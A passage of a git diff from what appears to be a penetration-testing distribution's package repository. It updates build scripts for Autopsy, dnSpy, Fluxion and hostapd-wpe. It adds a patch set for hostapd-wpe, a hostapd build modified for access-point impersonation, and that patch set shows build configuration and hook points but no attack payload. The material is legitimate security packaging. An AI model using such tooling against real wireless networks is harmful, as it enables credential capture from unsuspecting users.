diff --git a/packages/libs/perl/perl-getopt-long/PKGBUILD b/packages/libs/perl/perl-getopt-long/PKGBUILD index 5446fe628..686c8f238 100644 --- a/packages/libs/perl/perl-getopt-long/PKGBUILD +++ b/packages/libs/perl/perl-getopt-long/PKGBUILD @@ -3,8 +3,8 @@ pkgname=perl-getopt-long _pkgname=Getopt-Long -pkgver=2.51 -pkgrel=4 +pkgver=2.58 +pkgrel=1 pkgdesc='Extended processing of command line options.' arch=('any') url='https://metacpan.org/pod/Getopt::Long' @@ -12,7 +12,7 @@ license=('PerlArtistic' 'GPL') options=('!emptydirs') depends=('perl>=0') source=("http://search.cpan.org/CPAN/authors/id/J/JV/JV/$_pkgname-$pkgver.tar.gz") -sha512sums=('e70b2c30f5f85d7bf387381782a22b55f76598e1b4e19102fbf463c4333e91090ad2da49965be6211821d4f7f109aa7e4153348a9142f38fdb1a39299c997c02') +sha512sums=('c673b82a819533310d5697be7e0b009ed39fd02873d17b3f0e1eebab790c58faf5e0a6b1d79bf274e3ee9d35d43b355988dccae56ec9fcbc6822bcae7d7e2ef6') build() { cd "$_pkgname-$pkgver" diff --git a/packages/pentesting/autopsy/PKGBUILD b/packages/pentesting/autopsy/PKGBUILD index e9148d815..6ed80534a 100644 --- a/packages/pentesting/autopsy/PKGBUILD +++ b/packages/pentesting/autopsy/PKGBUILD @@ -4,15 +4,14 @@ pkgname=autopsy pkgver=4.21.0 _skver=4.12.1 -pkgrel=1 +pkgrel=2 epoch=1 pkgdesc='The forensic browser. A GUI for the Sleuth Kit.' groups=('athena' 'athena-forensic') arch=('x86_64') url='https://github.com/sleuthkit/autopsy' license=('MIT' 'Apache') -depends=('java-runtime' 'testdisk' 'sleuthkit' 'sleuthkit-java' 'python2-pytsk3' - 'python-pytsk3') +depends=('java-runtime' 'testdisk' 'sleuthkit' 'sleuthkit-java' 'python-pytsk3') source=("https://github.com/sleuthkit/autopsy/releases/download/$pkgname-$pkgver/$pkgname-$pkgver.zip" "$pkgname.desktop") sha512sums=('ce84748f1d0fc51d2015aac0a15a291262d6f50a157d2d8ba30f78450dca1a9620016e18604789179beba4a92d26b6b823825ca61ece643fcecb6f2b8c172c8f' @@ -40,4 +39,3 @@ package() { ln -sf "/opt/$pkgname/bin/$pkgname" "$pkgdir/usr/bin/$pkgname" } - diff --git a/packages/pentesting/dnspy/PKGBUILD b/packages/pentesting/dnspy/PKGBUILD index a3d8e1672..96d75f2e1 100644 --- a/packages/pentesting/dnspy/PKGBUILD +++ b/packages/pentesting/dnspy/PKGBUILD @@ -3,7 +3,7 @@ pkgname=dnspy pkgver=6.1.8 -pkgrel=1 +pkgrel=2 pkgdesc='.NET debugger and assembly editor.' url='https://github.com/0xd4d/dnSpy/' groups=('athena' 'athena-windows' 'athena-decompiler' @@ -19,6 +19,6 @@ package() { rm "$pkgname-$pkgver.zip" - cp -a * "$pkgdir/usr/share/windows/$pkgname/" + cp -a "dnSpy-$pkgver"/* "$pkgdir/usr/share/windows/$pkgname/" } diff --git a/packages/pentesting/fluxion/PKGBUILD b/packages/pentesting/fluxion/PKGBUILD index 619c9fa1f..34770a568 100644 --- a/packages/pentesting/fluxion/PKGBUILD +++ b/packages/pentesting/fluxion/PKGBUILD @@ -2,9 +2,9 @@ # See COPYING for license details. pkgname=fluxion -pkgver=1571.4f461a4 -pkgrel=2 -epoch=3 +pkgver=v4.10.r240.g4f461a4 +pkgrel=1 +epoch=4 pkgdesc='A security auditing and social-engineering research tool.' arch=('any') groups=('athena' 'athena-social' 'athena-wireless') @@ -12,8 +12,8 @@ url='https://github.com/FluxionNetwork/fluxion' license=('GPL3') source=("git+https://github.com/FluxionNetwork/$pkgname.git") depends=('aircrack-ng' 'bash>=4.2' 'coreutils' 'awk' 'iw' 'unzip' 'curl' 'bc' - 'xterm' 'cowpatty' 'dhcp' 'p7zip' 'hostapd' 'lighttpd' 'macchanger' - 'mdk3' 'mdk4' 'nmap' 'php-cgi' 'xorg-xdpyinfo') + 'xterm' 'cowpatty' 'dhcp' 'dsniff' 'p7zip' 'hostapd' 'lighttpd' + 'macchanger' 'mdk3' 'mdk4' 'nmap' 'php-cgi' 'xorg-xdpyinfo') makedepends=('binutils' 'coreutils' 'git') sha512sums=('SKIP') @@ -24,7 +24,12 @@ prepare() { pkgver() { cd $pkgname - echo $(git rev-list --count HEAD).$(git rev-parse --short HEAD) + ( set -o pipefail + git describe --long --tags --abbrev=7 2>/dev/null | + sed 's/\([^-]*-g\)/r\1/;s/-/./g' || + printf "%s.%s" "$(git rev-list --count HEAD)" \ + "$(git rev-parse --short=7 HEAD)" + ) } package() { @@ -34,7 +39,7 @@ package() { install -dm 755 "$pkgdir/usr/share/$pkgname" install -Dm 644 -t "$pkgdir/usr/share/doc/$pkgname/" *.md - install -Dm 644 -t "$pkgdir/usr/share/man/man1/" docs/man/fluxion.1 + install -Dm 644 -t "$pkgdir/usr/share/man/man1/" "docs/man/$pkgname.1" install -Dm 644 LICENSE "$pkgdir/usr/share/licenses/$pkgname/LICENSE" rm -rf *.md .git* *.yml .project .editorconfig diff --git a/packages/pentesting/hostapd-wpe/0001_adj-wpe.patch b/packages/pentesting/hostapd-wpe/0001_adj-wpe.patch new file mode 100644 index 000000000..32cb35d20 --- /dev/null +++ b/packages/pentesting/hostapd-wpe/0001_adj-wpe.patch @@ -0,0 +1,93 @@ +--- a/hostapd-2.11-wpe.patch ++++ b/hostapd-2.11-wpe.patch +@@ -3399,8 +3399,8 @@ + "User space daemon for IEEE 802.11 AP management,\n" + "IEEE 802.1X/WPA/WPA2/EAP/RADIUS Authenticator\n" + "Copyright (c) 2002-2024, Jouni Malinen " +-- "and contributors\n", +-+ "and contributors\n" ++- "and contributors\n", +++ "and contributors\n" + + "-----------------------------------------------------\n" + + "WPE (Wireless Pwnage Edition)\n" + + "This version has been cleverly modified to target\n" +@@ -3567,15 +3567,7 @@ + diff '--color=auto' -rupN hostapd-2.11/src/crypto/tls_openssl.c hostapd-2.11-wpe/src/crypto/tls_openssl.c + --- hostapd-2.11/src/crypto/tls_openssl.c 2024-07-26 12:31:12.300000000 +0000 + +++ hostapd-2.11-wpe/src/crypto/tls_openssl.c 2024-07-26 12:33:34.152000000 +0000 +-@@ -29,7 +29,6 @@ +- #include +- #include +- #include +--#include +- #if OPENSSL_VERSION_NUMBER >= 0x30000000L +- #include +- #include +-@@ -50,6 +49,7 @@ ++@@ -49,6 +49,7 @@ + #include "sha256.h" + #include "tls.h" + #include "tls_openssl.h" +@@ -3583,7 +3575,7 @@ + + #if !defined(CONFIG_FIPS) && \ + (defined(EAP_FAST) || defined(EAP_FAST_DYNAMIC) || \ +-@@ -205,6 +205,10 @@ static int tls_add_ca_from_keystore_enco ++@@ -204,6 +205,10 @@ static int tls_add_ca_from_keystore_enco + + #endif /* ANDROID */ + +@@ -3594,7 +3586,7 @@ + static int tls_openssl_ref_count = 0; + static int tls_ex_idx_session = -1; + +-@@ -1724,7 +1728,12 @@ struct tls_connection * tls_connection_i ++@@ -1723,7 +1728,12 @@ struct tls_connection * tls_connection_i + + conn->context = context; + SSL_set_app_data(conn->ssl, conn); +@@ -3608,7 +3600,7 @@ + SSL_set_msg_callback_arg(conn->ssl, conn); + options = SSL_OP_NO_SSLv2 | SSL_OP_NO_SSLv3 | + SSL_OP_SINGLE_DH_USE; +-@@ -4501,6 +4510,10 @@ openssl_handshake(struct tls_connection ++@@ -4500,6 +4510,10 @@ openssl_handshake(struct tls_connection + struct tls_context *context = conn->context; + int res; + struct wpabuf *out_data; +@@ -3619,7 +3611,7 @@ + + /* + * Give TLS handshake data from the server (if available) to OpenSSL +-@@ -4619,6 +4632,30 @@ openssl_handshake(struct tls_connection ++@@ -4618,6 +4632,30 @@ openssl_handshake(struct tls_connection + } + wpabuf_put(out_data, res); + +@@ -3650,7 +3642,7 @@ + return out_data; + } + +-@@ -4751,6 +4788,13 @@ struct wpabuf * tls_connection_encrypt(v ++@@ -4750,6 +4788,13 @@ struct wpabuf * tls_connection_encrypt(v + tls_show_errors(MSG_INFO, __func__, "BIO_reset failed"); + return NULL; + } +@@ -3664,7 +3656,7 @@ + res = SSL_write(conn->ssl, wpabuf_head(in_data), wpabuf_len(in_data)); + if (res < 0) { + tls_show_errors(MSG_INFO, __func__, +-@@ -4758,6 +4802,12 @@ struct wpabuf * tls_connection_encrypt(v ++@@ -4757,6 +4802,12 @@ struct wpabuf * tls_connection_encrypt(v + return NULL; + } + +@@ -3677,7 +3669,7 @@ + /* Read encrypted data to be sent to the server */ + buf = wpabuf_alloc(wpabuf_len(in_data) + 300); + if (buf == NULL) +-@@ -6028,3 +6078,69 @@ bool tls_connection_get_own_cert_used(st ++@@ -6027,3 +6078,68 @@ bool tls_connection_get_own_cert_used(st + return SSL_get_certificate(conn->ssl) != NULL; + return false; + } diff --git a/packages/pentesting/hostapd-wpe/PKGBUILD b/packages/pentesting/hostapd-wpe/PKGBUILD index fd8e88b45..9df0fbcf6 100644 --- a/packages/pentesting/hostapd-wpe/PKGBUILD +++ b/packages/pentesting/hostapd-wpe/PKGBUILD @@ -1,48 +1,42 @@ # Credits BlackArch ( https://www.blackarch.org/ ). # See COPYING for license details. -# NOTE: initially ripped from AUR, but we changed a lot here (style). - pkgname=hostapd-wpe -_pkgname=hostapd -pkgver=2.9.1 -_pkgver=2.9 -pkgrel=3 -groups=('athena' 'athena-wireless') +_pkgname=hostap +pkgver=2.11 +pkgrel=1 pkgdesc='Modified hostapd to facilitate AP impersonation attacks.' +groups=('athena' 'athena-wireless') arch=('x86_64' 'aarch64') url='https://w1.fi/hostapd/' -license=('BSD') -depends=('openssl-1.0' 'libnl' 'sqlite') -source=("https://w1.fi/releases/$_pkgname-$_pkgver.tar.gz" - "https://patches.aircrack-ng.org/wpe/hostapd-wpe/$pkgname.patch") -# "https://raw.githubusercontent.com/aircrack-ng/aircrack-ng/master/patches/wpe/hostapd-wpe/$pkgname.patch") -install="$pkgname.install" -sha512sums=('66c729380152db18b64520bda55dfa00af3b0264f97b5de100b81a46e2593571626c4bdcf900f0988ea2131e30bc8788f75d8489dd1f57e37fd56e8098e48a9c' - 'c1ef9f6b9b3d3d04fa98fb9568acc45a5c52a00411a5ebbbf3a80835cc27f6cdc5003343f37964fbac2c7c1fefffdf999d620f0e39797c0c37030090735526a5') +license=('BSD-3-Clause') +depends=('glibc' 'libnl' 'openssl-1.0' 'sqlite') +makedepends=('git') +source=("git+https://w1.fi/$_pkgname.git?signed#tag=${_pkgname}_${pkgver//./_}" + '0001_adj-wpe.patch' + "https://raw.githubusercontent.com/aircrack-ng/aircrack-ng/master/patches/wpe/$pkgname/${_pkgname}d-$pkgver-wpe.patch") +sha512sums=('de2ba10af60bc88f0f900fe4a90681d9f08318bf12f88227881f6c4f2c4c628b89515a5425242048b8867b1791f5613fbfa1c3adeecf345aeb4093cac5eb62e4' + '30cb5301c0ee90ae8e1dd9f17b27e0b6ee253919251bb8cc6da3b340e632607915f30952e17e9e4cf9adc3ee062354e4b7bd55ddddc82753050dcba7ef9cd646' + 'c46fbd8a10045d8df09f28b37992c32b9f34604d380ff47a0158ef3afcf9b406f8788ddd8e5e1cc2478f4800de2417504d756b11ccf9628046dd8a150e1fd44c') +validpgpkeys=(EC4AA0A991A5F2464582D52D2B6EF432EFC895FA) # Jouni Malinen prepare() { - cd "$_pkgname-$_pkgver" + # Adjust aircrack-ng patch as it doesn't cleanly apply + patch -Np1 --follow-symlinks -i "${srcdir}"/0001_adj-wpe.patch - patch -p1 -i "$srcdir/$pkgname.patch" + # Apply aircrack-ng patch + patch -Np1 -d $_pkgname -i "${srcdir}"/${_pkgname}d-${pkgver}-wpe.patch } build() { - cd "$_pkgname-$_pkgver/$_pkgname" - - make + make -C $_pkgname/${_pkgname}d } package() { - cd "$_pkgname-$_pkgver/$_pkgname" - - make DESTDIR="$pkgdir" install - make DESTDIR="$pkgdir" wpe + cd $_pkgname - install -Dm 644 "$srcdir/$_pkgname-$_pkgver/COPYING" \ - "$pkgdir/usr/share/licenses/$pkgname/COPYING" + make -C ${_pkgname}d install DESTDIR="$pkgdir" BINDIR=/usr/bin - mv "$pkgdir/usr/local/bin" "$pkgdir/usr/bin" - rmdir "$pkgdir/usr/local" + install -vDm 644 COPYING -t "$pkgdir/usr/share/licenses/$pkgname/" } diff --git a/packages/pentesting/hostapd-wpe/hostapd-2.11-wpe.patch b/packages/pentesting/hostapd-wpe/hostapd-2.11-wpe.patch new file mode 100644 index 000000000..34b195315 --- /dev/null +++ b/packages/pentesting/hostapd-wpe/hostapd-2.11-wpe.patch @@ -0,0 +1,4222 @@ +diff '--color=auto' -rupN hostapd-2.11/hostapd/.config hostapd-2.11-wpe/hostapd/.config +--- hostapd-2.11/hostapd/.config 1970-01-01 00:00:00.000000000 +0000 ++++ hostapd-2.11-wpe/hostapd/.config 2024-07-26 09:11:33.196000000 +0000 +@@ -0,0 +1,416 @@ ++# Wireless Pawn Edition HostAPd configuration file ++# ++# This file lists the configuration options that are used when building the ++# hostapd binary. All lines starting with # are ignored. Configuration option ++# lines must be commented out complete, if they are not to be included, i.e., ++# just setting VARIABLE=n is not disabling that variable. ++# ++# This file is included in Makefile, so variables like CFLAGS and LIBS can also ++# be modified from here. In most cass, these lines should use += in order not ++# to override previous values of the variables. ++ ++# Driver interface for Host AP driver ++CONFIG_DRIVER_HOSTAP=y ++ ++# Driver interface for wired authenticator ++CONFIG_DRIVER_WIRED=y ++ ++# Driver interface for drivers using the nl80211 kernel interface ++CONFIG_DRIVER_NL80211=y ++ ++# QCA vendor extensions to nl80211 ++CONFIG_DRIVER_NL80211_QCA=y ++ ++# driver_nl80211.c requires libnl. If you are compiling it yourself ++# you may need to point hostapd to your version of libnl. ++# ++#CFLAGS += -I$ ++#LIBS += -L$ ++ ++# Use libnl v2.0 (or 3.0) libraries. ++#CONFIG_LIBNL20=y ++ ++# Use libnl 3.2 libraries (if this is selected, CONFIG_LIBNL20 is ignored) ++CONFIG_LIBNL32=y ++ ++ ++# Driver interface for FreeBSD net80211 layer (e.g., Atheros driver) ++#CONFIG_DRIVER_BSD=y ++#CFLAGS += -I/usr/local/include ++#LIBS += -L/usr/local/lib ++#LIBS_p += -L/usr/local/lib ++#LIBS_c += -L/usr/local/lib ++ ++# Driver interface for no driver (e.g., RADIUS server only) ++#CONFIG_DRIVER_NONE=y ++ ++# WPA2/IEEE 802.11i RSN pre-authentication ++CONFIG_RSN_PREAUTH=y ++ ++# Support Operating Channel Validation ++#CONFIG_OCV=y ++ ++# Integrated EAP server ++CONFIG_EAP=y ++ ++# EAP Re-authentication Protocol (ERP) in integrated EAP server ++CONFIG_ERP=y ++ ++# EAP-MD5 for the integrated EAP server ++CONFIG_EAP_MD5=y ++ ++# EAP-TLS for the integrated EAP server ++CONFIG_EAP_TLS=y ++ ++# EAP-MSCHAPv2 for the integrated EAP server ++CONFIG_EAP_MSCHAPV2=y ++ ++# EAP-PEAP for the integrated EAP server ++CONFIG_EAP_PEAP=y ++ ++# EAP-GTC for the integrated EAP server ++CONFIG_EAP_GTC=y ++ ++# EAP-TTLS for the integrated EAP server ++CONFIG_EAP_TTLS=y ++ ++# EAP-SIM for the integrated EAP server ++CONFIG_EAP_SIM=y ++ ++# EAP-AKA for the integrated EAP server ++CONFIG_EAP_AKA=y ++ ++# EAP-AKA' for the integrated EAP server ++# This requires CONFIG_EAP_AKA to be enabled, too. ++CONFIG_EAP_AKA_PRIME=y ++ ++# EAP-PAX for the integrated EAP server ++CONFIG_EAP_PAX=y ++ ++# EAP-PSK for the integrated EAP server (this is _not_ needed for WPA-PSK) ++CONFIG_EAP_PSK=y ++ ++# EAP-pwd for the integrated EAP server (secure authentication with a password) ++CONFIG_EAP_PWD=y ++ ++# EAP-SAKE for the integrated EAP server ++CONFIG_EAP_SAKE=y ++ ++# EAP-GPSK for the integrated EAP server ++CONFIG_EAP_GPSK=y ++# Include support for optional SHA256 cipher suite in EAP-GPSK ++CONFIG_EAP_GPSK_SHA256=y ++ ++# EAP-FAST for the integrated EAP server ++CONFIG_EAP_FAST=y ++ ++# EAP-TEAP for the integrated EAP server ++# Note: The current EAP-TEAP implementation is experimental and should not be ++# enabled for production use. The IETF RFC 7170 that defines EAP-TEAP has number ++# of conflicting statements and missing details and the implementation has ++# vendor specific workarounds for those and as such, may not interoperate with ++# any other implementation. This should not be used for anything else than ++# experimentation and interoperability testing until those issues has been ++# resolved. ++CONFIG_EAP_TEAP=y ++ ++# Wi-Fi Protected Setup (WPS) ++CONFIG_WPS=y ++# Enable UPnP support for external WPS Registrars ++CONFIG_WPS_UPNP=y ++# Enable WPS support with NFC config method ++CONFIG_WPS_NFC=y ++ ++# EAP-IKEv2 ++CONFIG_EAP_IKEV2=y ++ ++# Trusted Network Connect (EAP-TNC) ++CONFIG_EAP_TNC=y ++ ++# EAP-EKE for the integrated EAP server ++CONFIG_EAP_EKE=y ++ ++# PKCS#12 (PFX) support (used to read private key and certificate file from ++# a file that usually has extension .p12 or .pfx) ++CONFIG_PKCS12=y ++ ++# RADIUS authentication server. This provides access to the integrated EAP ++# server from external hosts using RADIUS. ++CONFIG_RADIUS_SERVER=y ++ ++# Build IPv6 support for RADIUS operations ++CONFIG_IPV6=y ++ ++# IEEE Std 802.11r-2008 (Fast BSS Transition) ++CONFIG_IEEE80211R=y ++ ++# Use the hostapd's IEEE 802.11 authentication (ACL), but without ++# the IEEE 802.11 Management capability (e.g., FreeBSD/net80211) ++CONFIG_DRIVER_RADIUS_ACL=y ++ ++# Wireless Network Management (IEEE Std 802.11v-2011) ++# Note: This is experimental and not complete implementation. ++CONFIG_WNM=y ++ ++# IEEE 802.11ac (Very High Throughput) support ++CONFIG_IEEE80211AC=y ++ ++# IEEE 802.11ax HE support ++# Note: This is experimental and work in progress. The definitions are still ++# subject to change and this should not be expected to interoperate with the ++# final IEEE 802.11ax version. ++CONFIG_IEEE80211AX=y ++ ++# Remove debugging code that is printing out debug messages to stdout. ++# This can be used to reduce the size of the hostapd considerably if debugging ++# code is not needed. ++#CONFIG_NO_STDOUT_DEBUG=y ++ ++# Add support for writing debug log to a file: -f /tmp/hostapd.log ++# Disabled by default. ++CONFIG_DEBUG_FILE=y ++ ++# Send debug messages to syslog instead of stdout ++CONFIG_DEBUG_SYSLOG=y ++ ++# Add support for sending all debug messages (regardless of debug verbosity) ++# to the Linux kernel tracing facility. This helps debug the entire stack by ++# making it easy to record everything happening from the driver up into the ++# same file, e.g., using trace-cmd. ++CONFIG_DEBUG_LINUX_TRACING=y ++ ++# Remove support for RADIUS accounting ++#CONFIG_NO_ACCOUNTING=y ++ ++# Remove support for RADIUS ++#CONFIG_NO_RADIUS=y ++ ++# Remove support for VLANs ++#CONFIG_NO_VLAN=y ++ ++# Enable support for fully dynamic VLANs. This enables hostapd to ++# automatically create bridge and VLAN interfaces if necessary. ++#CONFIG_FULL_DYNAMIC_VLAN=y ++ ++# Use netlink-based kernel API for VLAN operations instead of ioctl() ++# Note: This requires libnl 3.1 or newer. ++#CONFIG_VLAN_NETLINK=y ++ ++# Remove support for dumping internal state through control interface commands ++# This can be used to reduce binary size at the cost of disabling a debugging ++# option. ++#CONFIG_NO_DUMP_STATE=y ++ ++# Enable tracing code for developer debugging ++# This tracks use of memory allocations and other registrations and reports ++# incorrect use with a backtrace of call (or allocation) location. ++#CONFIG_WPA_TRACE=y ++# For BSD, comment out these. ++#LIBS += -lexecinfo ++#LIBS_p += -lexecinfo ++#LIBS_c += -lexecinfo ++ ++# Use libbfd to get more details for developer debugging ++# This enables use of libbfd to get more detailed symbols for the backtraces ++# generated by CONFIG_WPA_TRACE=y. ++#CONFIG_WPA_TRACE_BFD=y ++# For BSD, comment out these. ++#LIBS += -lbfd -liberty -lz ++#LIBS_p += -lbfd -liberty -lz ++#LIBS_c += -lbfd -liberty -lz ++ ++# hostapd depends on strong random number generation being available from the ++# operating system. os_get_random() function is used to fetch random data when ++# needed, e.g., for key generation. On Linux and BSD systems, this works by ++# reading /dev/urandom. It should be noted that the OS entropy pool needs to be ++# properly initialized before hostapd is started. This is important especially ++# on embedded devices that do not have a hardware random number generator and ++# may by default start up with minimal entropy available for random number ++# generation. ++# ++# As a safety net, hostapd is by default trying to internally collect ++# additional entropy for generating random data to mix in with the data ++# fetched from the OS. This by itself is not considered to be very strong, but ++# it may help in cases where the system pool is not initialized properly. ++# However, it is very strongly recommended that the system pool is initialized ++# with enough entropy either by using hardware assisted random number ++# generator or by storing state over device reboots. ++# ++# hostapd can be configured to maintain its own entropy store over restarts to ++# enhance random number generation. This is not perfect, but it is much more ++# secure than using the same sequence of random numbers after every reboot. ++# This can be enabled with -e command line option. The specified ++# file needs to be readable and writable by hostapd. ++# ++# If the os_get_random() is known to provide strong random data (e.g., on ++# Linux/BSD, the board in question is known to have reliable source of random ++# data from /dev/urandom), the internal hostapd random pool can be disabled. ++# This will save some in binary size and CPU use. However, this should only be ++# considered for builds that are known to be used on devices that meet the ++# requirements described above. ++#CONFIG_NO_RANDOM_POOL=y ++ ++# Should we attempt to use the getrandom(2) call that provides more reliable ++# yet secure randomness source than /dev/random on Linux 3.17 and newer. ++# Requires glibc 2.25 to build, falls back to /dev/random if unavailable. ++#CONFIG_GETRANDOM=y ++ ++# Should we use poll instead of select? Select is used by default. ++#CONFIG_ELOOP_POLL=y ++ ++# Should we use epoll instead of select? Select is used by default. ++#CONFIG_ELOOP_EPOLL=y ++ ++# Should we use kqueue instead of select? Select is used by default. ++#CONFIG_ELOOP_KQUEUE=y ++ ++# Select TLS implementation ++# openssl = OpenSSL (default) ++# gnutls = GnuTLS ++# internal = Internal TLSv1 implementation (experimental) ++# linux = Linux kernel AF_ALG and internal TLSv1 implementation (experimental) ++# none = Empty template ++#CONFIG_TLS=openssl ++ ++# TLS-based EAP methods require at least TLS v1.0. Newer version of TLS (v1.1) ++# can be enabled to get a stronger construction of messages when block ciphers ++# are used. ++CONFIG_TLSV11=y ++ ++# TLS-based EAP methods require at least TLS v1.0. Newer version of TLS (v1.2) ++# can be enabled to enable use of stronger crypto algorithms. ++CONFIG_TLSV12=y ++ ++# Select which ciphers to use by default with OpenSSL if the user does not ++# specify them. ++CONFIG_TLS_DEFAULT_CIPHERS="ALL" ++ ++# If CONFIG_TLS=internal is used, additional library and include paths are ++# needed for LibTomMath. Alternatively, an integrated, minimal version of ++# LibTomMath can be used. See beginning of libtommath.c for details on benefits ++# and drawbacks of this option. ++#CONFIG_INTERNAL_LIBTOMMATH=y ++#ifndef CONFIG_INTERNAL_LIBTOMMATH ++#LTM_PATH=/usr/src/libtommath-0.39 ++#CFLAGS += -I$(LTM_PATH) ++#LIBS += -L$(LTM_PATH) ++#LIBS_p += -L$(LTM_PATH) ++#endif ++# At the cost of about 4 kB of additional binary size, the internal LibTomMath ++# can be configured to include faster routines for exptmod, sqr, and div to ++# speed up DH and RSA calculation considerably ++CONFIG_INTERNAL_LIBTOMMATH_FAST=y ++ ++# Interworking (IEEE 802.11u) ++# This can be used to enable functionality to improve interworking with ++# external networks. ++CONFIG_INTERWORKING=y ++ ++# Hotspot 2.0 ++CONFIG_HS20=y ++ ++# Enable SQLite database support in hlr_auc_gw, EAP-SIM DB, and eap_user_file ++CONFIG_SQLITE=y ++ ++# Enable Fast Session Transfer (FST) ++CONFIG_FST=y ++ ++# Enable CLI commands for FST testing ++#CONFIG_FST_TEST=y ++ ++# Testing options ++# This can be used to enable some testing options (see also the example ++# configuration file) that are really useful only for testing clients that ++# connect to this hostapd. These options allow, for example, to drop a ++# certain percentage of probe requests or auth/(re)assoc frames. ++# ++CONFIG_TESTING_OPTIONS=y ++ ++# Automatic Channel Selection ++# This will allow hostapd to pick the channel automatically when channel is set ++# to "acs_survey" or "0". Eventually, other ACS algorithms can be added in ++# similar way. ++# ++# Automatic selection is currently only done through initialization, later on ++# we hope to do background checks to keep us moving to more ideal channels as ++# time goes by. ACS is currently only supported through the nl80211 driver and ++# your driver must have survey dump capability that is filled by the driver ++# during scanning. ++# ++# You can customize the ACS survey algorithm with the hostapd.conf variable ++# acs_num_scans. ++# ++# Supported ACS drivers: ++# * ath9k ++# * ath5k ++# * ath10k ++# ++# For more details refer to: ++# https://wireless.wiki.kernel.org/en/users/documentation/acs ++# ++CONFIG_ACS=y ++ ++# Multiband Operation support ++# These extensions facilitate efficient use of multiple frequency bands ++# available to the AP and the devices that may associate with it. ++CONFIG_MBO=y ++ ++# Client Taxonomy ++# Has the AP retain the Probe Request and (Re)Association Request frames from ++# a client, from which a signature can be produced which can identify the model ++# of client device like "Nexus 6P" or "iPhone 5s". ++CONFIG_TAXONOMY=y ++ ++# Fast Initial Link Setup (FILS) (IEEE 802.11ai) ++CONFIG_FILS=y ++# FILS shared key authentication with PFS ++CONFIG_FILS_SK_PFS=y ++ ++# Include internal line edit mode in hostapd_cli. This can be used to provide ++# limited command line editing and history support. ++CONFIG_WPA_CLI_EDIT=y ++ ++# Opportunistic Wireless Encryption (OWE) ++# Experimental implementation of draft-harkins-owe-07.txt ++CONFIG_OWE=y ++ ++# Airtime policy support ++CONFIG_AIRTIME_POLICY=y ++ ++# Override default value for the wpa_disable_eapol_key_retries configuration ++# parameter. See that parameter in hostapd.conf for more details. ++#CFLAGS += -DDEFAULT_WPA_DISABLE_EAPOL_KEY_RETRIES=1 ++ ++# Wired equivalent privacy (WEP) ++# WEP is an obsolete cryptographic data confidentiality algorithm that is not ++# considered secure. It should not be used for anything anymore. The ++# functionality needed to use WEP is available in the current hostapd ++# release under this optional build parameter. This functionality is subject to ++# be completely removed in a future release. ++CONFIG_WEP=y ++ ++# Remove all TKIP functionality ++# TKIP is an old cryptographic data confidentiality algorithm that is not ++# considered secure. It should not be used anymore. For now, the default hostapd ++# build includes this to allow mixed mode WPA+WPA2 networks to be enabled, but ++# that functionality is subject to be removed in the future. ++#CONFIG_NO_TKIP=y ++ ++# Pre-Association Security Negotiation (PASN) ++# Experimental implementation based on IEEE P802.11z/D2.6 and the protocol ++# design is still subject to change. As such, this should not yet be enabled in ++# production use. ++# This requires CONFIG_IEEE80211W=y to be enabled, too. ++CONFIG_PASN=y ++CONFIG_IEEE80211W=y ++ ++# Device Provisioning Protocol (DPP) (also known as Wi-Fi Easy Connect) ++CONFIG_DPP=y ++# DPP version 2 support ++CONFIG_DPP2=y ++# DPP version 3 support (experimental and still changing; do not enable for ++# production use) ++CONFIG_DPP3=y ++ ++# Forgotten/lost somewhere ++CONFIG_SAE=y +diff '--color=auto' -rupN hostapd-2.11/hostapd/Makefile hostapd-2.11-wpe/hostapd/Makefile +--- hostapd-2.11/hostapd/Makefile 2024-07-20 18:04:37.000000000 +0000 ++++ hostapd-2.11-wpe/hostapd/Makefile 2024-07-26 12:17:15.692000000 +0000 +@@ -1,4 +1,4 @@ +-ALL=hostapd hostapd_cli ++ALL=hostapd-wpe hostapd_cli-wpe + CONFIG_FILE = .config + + include ../src/build.rules +@@ -85,6 +85,7 @@ OBJS += ../src/ap/bss_load.o + OBJS += ../src/ap/neighbor_db.o + OBJS += ../src/ap/rrm.o + OBJS += ../src/common/ptksa_cache.o ++OBJS += ../src/wpe/wpe.o + + OBJS_c = hostapd_cli.o + OBJS_c += ../src/common/wpa_ctrl.o +@@ -1303,11 +1304,20 @@ $(DESTDIR)$(BINDIR)/%: % + + install: $(addprefix $(DESTDIR)$(BINDIR)/,$(ALL)) + ++wpe: ++ install -d $(DESTDIR)/etc/hostapd-wpe ++ install -m 644 hostapd-wpe.conf hostapd-wpe.eap_user $(DESTDIR)/etc/hostapd-wpe ++ install -d $(DESTDIR)/etc/hostapd-wpe/certs ++ install -d $(DESTDIR)/etc/hostapd-wpe/certs/demoCA ++ install -m 644 certs/demoCA/cacert.pem $(DESTDIR)/etc/hostapd-wpe/certs/demoCA ++ install -m 755 certs/bootstrap $(DESTDIR)/etc/hostapd-wpe/certs ++ install -m 644 certs/ca.cnf certs/client.cnf certs/Makefile certs/README certs/README.wpe certs/server.cnf certs/xpextensions $(DESTDIR)/etc/hostapd-wpe/certs ++ + _OBJS_VAR := OBJS + include ../src/objs.mk + +-hostapd: $(OBJS) +- $(Q)$(CC) $(LDFLAGS) -o hostapd $(OBJS) $(LIBS) ++hostapd-wpe: $(OBJS) ++ $(Q)$(CC) $(LDFLAGS) -o $@ $(OBJS) $(LIBS) + @$(E) " LD " $@ + + ifdef CONFIG_WPA_TRACE +@@ -1317,8 +1327,8 @@ endif + _OBJS_VAR := OBJS_c + include ../src/objs.mk + +-hostapd_cli: $(OBJS_c) +- $(Q)$(CC) $(LDFLAGS) -o hostapd_cli $(OBJS_c) $(LIBS_c) ++hostapd_cli-wpe: $(OBJS_c) ++ $(Q)$(CC) $(LDFLAGS) -o $@ $(OBJS_c) $(LIBS_c) + @$(E) " LD " $@ + + NOBJS = nt_password_hash.o ../src/crypto/ms_funcs.o $(SHA1OBJS) +diff '--color=auto' -rupN hostapd-2.11/hostapd/certs/Makefile hostapd-2.11-wpe/hostapd/certs/Makefile +--- hostapd-2.11/hostapd/certs/Makefile 1970-01-01 00:00:00.000000000 +0000 ++++ hostapd-2.11-wpe/hostapd/certs/Makefile 2024-07-26 09:11:33.200000000 +0000 +@@ -0,0 +1,145 @@ ++###################################################################### ++# ++# Make file to be installed in /etc/raddb/certs to enable ++# the easy creation of certificates. ++# ++# See the README file in this directory for more information. ++# ++# $Id: cc12464c6c7754aff2f0c8d6e116708c94ff2168 $ ++# ++###################################################################### ++ ++DH_KEY_SIZE = 2048 ++ ++# ++# Set the passwords ++# ++-include passwords.mk ++ ++###################################################################### ++# ++# Make the necessary files, but not client certificates. ++# ++###################################################################### ++.PHONY: all ++all: index.txt serial dh server ca client ++ ++.PHONY: client ++client: client.pem ++ 